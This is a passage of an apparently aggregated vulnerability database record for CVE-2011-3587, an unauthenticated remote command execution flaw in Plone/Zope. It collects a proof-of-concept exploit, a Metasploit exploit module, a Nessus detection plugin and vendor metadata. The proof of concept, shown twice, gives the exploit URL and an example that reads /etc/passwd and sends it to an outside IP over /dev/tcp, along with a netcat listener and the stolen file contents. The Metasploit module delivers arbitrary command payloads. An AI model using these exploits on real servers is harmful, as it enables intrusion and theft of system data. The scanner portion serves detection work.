ID: CVE-2011-3587\r\n\r\nZope\u662f\u4e00\u4e2a\u5f00\u6e90\u7684web\u5e94\u7528\u670d\u52a1\u5668\uff0c\u4e3b\u8981\u7528python\u5199\u6210\r\n\r\n\r\nZope\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u975e\u6cd5\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u90e8\u7f72\u7279\u5236\u7684Web\u8bf7\u6c42\u5e76\u4ee5Zope/Plone\u670d\u52a1\u6743\u9650\u6267\u884c\u4efb\u610f\u547d\u4ee4\r\n0\r\nZope 2.13.9\r\nZope 2.13.8\r\nZope 2.13\r\nZope 2.12.19\r\nZope 2.12\r\nPlone 4.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nZope\r\n----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.zope.org/", "published": "2014-07-01T00:00:00", "title": "Plone and Zope Remote Command Execution PoC", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72431", "id": "SSV:72431", "sourceData": "\n # Exploit Title: Plone - Remote Command Execution\r\n# Date: 12/21/2011\r\n# Author: Nick Miles (www.npenetrable.com)\r\n# Tested on: 12/21/2011\r\n# CVE : CVE-2011-3587\r\n\r\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\r\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\r\nVersions Not Affected: Versions of Plone that use Zope other than Zope\r\n2.12.x and Zope 2.13.x.\r\n\r\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\r\n\r\nYou can execute any command on the remote Plone server with the\r\nfollowing request\r\nif the server is Unix/Linux based (Note: you won't get returned the\r\nresults of the command):\r\n\r\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\r\nto run>\r\n\r\nExample:\r\n\r\nListen for a connection:\r\n$ nc -l 4040\r\n\r\nOn victim, visit:\r\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\r\n\r\nResponse:\r\n$ nc -l 4040\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/sbin/nologin\r\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\r\nadm:x:3:4:adm:/var/adm:/sbin/nologin\r\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\r\nsync:x:5:0:sync:/sbin:/bin/sync\r\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\r\nhalt:x:7:0:halt:/sbin:/sbin/halt\r\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\r\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\r\noperator:x:11:0:operator:/root:/sbin/nologin\r\ngames:x:12:100:games:/usr/games:/sbin/nologin\r\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\r\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\r\nnobody:x:99:99:Nobody:/:/sbin/nologin\r\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\r\nsaslauth:x:499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin\r\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\r\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\r\nntp:x:38:38::/etc/ntp:/sbin/nologin\r\ntcpdump:x:72:72::/:/sbin/nologin\r\napache:x:48:48:Apache:/var/www:/sbin/nologin\r\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\r\nplone:x:500:500::/home/plone:/bin/false\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72431"}], "metasploit": [{"lastseen": "2020-10-13T00:57:46", "description": "Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.\n", "published": "2011-12-27T06:59:26", "type": "metasploit", "title": "Plone and Zope XMLTools Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/PLONE_POPEN2", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Plone and Zope XMLTools Remote Command Execution',\n 'Description' => %q{\n Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x\n through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute\n arbitrary commands via vectors related to the p_ class in OFS/misc_.py and\n the use of Python modules.\n\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Plone Security Team, original vulnerability discovery\n 'Nick Miles', # Original exploit\n 'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2011-3587'],\n ['OSVDB', '76105'],\n ['EDB', '18262'],\n ['URL', 'http://plone.org/products/plone/security/advisories/20110928']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic telnet perl ruby python',\n }\n },\n 'Platform' => %w{ linux unix },\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Automatic',{}]],\n 'DisclosureDate' => '2011-10-04',\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('URI',[true, \"The path to the Plone installation\", \"/\"]),\n ])\n register_autofilter_ports([ 8080 ])\n end\n\n def check\n uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')\n\n res = send_request_raw(\n {\n 'uri' => uri\n }, 25)\n if (res.headers['Bobo-Exception-Type'].to_s =~ /zExceptions.BadRequest/)\n return Exploit::CheckCode::Appears\n end\n # patched == zExceptions.NotFound\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')\n\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' =>\n {\n 'cmd' => payload.encoded,\n }\n }, 0.5) # short timeout, we don't care about the response\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/plone_popen2.rb"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPlone and Zope - Remote Command Execution", "edition": 1, "published": "2011-12-21T00:00:00", "title": "Plone and Zope - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-21T00:00:00", "id": "EXPLOITPACK:B47D124EE589B60CD13076B667252C83", "href": "", "sourceData": "# Exploit Title: Plone - Remote Command Execution\n# Date: 12/21/2011\n# Author: Nick Miles (www.npenetrable.com)\n# Tested on: 12/21/2011\n# CVE : CVE-2011-3587\n\nVersions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone\n4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.\nVersions Not Affected: Versions of Plone that use Zope other than Zope\n2.12.x and Zope 2.13.x.\n\nAdvisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928\n\nYou can execute any command on the remote Plone server with the\nfollowing request\nif the server is Unix/Linux based (Note: you won't get returned the\nresults of the command):\n\nhttp://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command\nto run>\n\nExample:\n\nListen for a connection:\n$ nc -l 4040\n\nOn victim, visit:\nhttp://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040\n\nResponse:\n$ nc -l 4040\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\ngopher:x:13:30:gopher:/var/gopher:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\nsaslauth:x:499:499:\"Saslauthd user\":/var/empty/saslauth:/sbin/nologin\npostfix:x:89:89::/var/spool/postfix:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\napache:x:48:48:Apache:/var/www:/sbin/nologin\nmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\nplone:x:500:500::/home/plone:/bin/false", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T13:26:31", "description": "The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.", "edition": 27, "published": "2011-12-20T00:00:00", "title": "Plone Request Parsing Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3587"], "modified": "2011-12-20T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_20110928.NASL", "href": "https://www.tenable.com/plugins/nessus/57350", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57350);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-3587\");\n script_bugtraq_id(49857);\n\n script_name(english:\"Plone Request Parsing Remote Command Execution\");\n script_summary(english:\"Tries to execute a command.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web application on the remote host allows arbitrary remote code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Plone hosted on the remote web server has a flaw that\nallows arbitrary access to Python modules. Using a specially crafted\nURL, this can allow an unauthenticated, remote attacker the ability to\nrun arbitrary commands on the system through the Python 'os' module in\nthe context of the 'Zope/Plone' service.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone/security/advisories/20110928\");\n script_set_attribute(attribute:\"see_also\", value:\"http://plone.org/products/plone-hotfix/releases/20110928\");\n # http://zope2.zope.org/news/security-vulnerability-announcement-cve-2011-3587\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b32a0de5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://pypi.org/project/Products.PloneHotfix20110928/1.0/\");\n script_set_attribute(attribute:\"solution\", value:\"Follow the instructions in the advisory to apply the hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Plone RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Plone and Zope XMLTools Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Verify the vuln exists (regardless of whether we can exploit it)\nos_module = \"p_/webdav/xmltools/minidom/xml/sax/saxutils/os\";\nurl = dir + \"/\" + os_module;\n\nres = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\n\nif (\"<module 'os' from '\" >!< res[2])\n exit(0, \"The Plone installation at \" + build_url(port:port, qs:dir) + \" is not affected.\");\n\n# it looks like only Unix Systems have popen2 compiled in,\n# so this shouldn't work on Windows - but we can try anyways\nfile_name = SCRIPT_NAME + \"-\" + unixtime();\nunix_command = urlencode(str:\"touch /tmp/\"+ file_name);\nwindows_command = urlencode(str:\"echo \" + SCRIPT_NAME + \" > %windir%/temp/\"+file_name);\n\nverify_instructions =\n'An attempt was made to create a temporary file on the remote host.\\n'+\n'You can verify its existence by checking for it at the following\\n'+\n'path';\n\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os)\n {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's:\\n\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n }\n else\n {\n commands = make_list(unix_command);\n verify_instructions += ':\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n }\n}\nelse {\n commands = make_list(unix_command, windows_command);\n verify_instructions += 's (dependent on host operating system):\\n\\n';\n verify_instructions += ' /tmp/' + file_name + '\\n';\n verify_instructions += ' C:\\\\Windows\\\\temp\\\\' + file_name + '\\n';\n verify_instructions += ' C:\\\\Winnt\\\\temp\\\\' + file_name + '\\n';\n}\n\ncommand_success = FALSE;\nurl_list = make_list();\n\nforeach command (commands)\n{\n url = dir + \"/\" + os_module + \"/popen2?cmd=\" + command;\n url_list = make_list(url_list, url);\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (\"<open file '<fdopen>'\" >< res[2]) command_success = TRUE;\n}\n\nif (report_verbosity > 0)\n{\n if (command_success)\n {\n report = '\\nNessus was allowed to execute commands on the remote host.\\n' +\n 'The following requests were made:\\n\\n';\n foreach url (url_list)\n report += ' ' + build_url(qs:url, port:port) + '\\n';\n report += '\\n' + verify_instructions;\n }\n else\n {\n report = '\\nNessus was able to determine that the vulnerability exists on the\\n' +\n 'remote host, but was not able to successfully exploit it.\\n';\n }\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3587"], "description": "type a short description of the vulnerability here\n\nVulnerability Type: Remote Command Execution", "modified": "2013-03-26T00:00:00", "published": "2012-01-26T00:00:00", "id": "E-21", "href": "", "type": "dsquare", "title": "Plone RCE", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
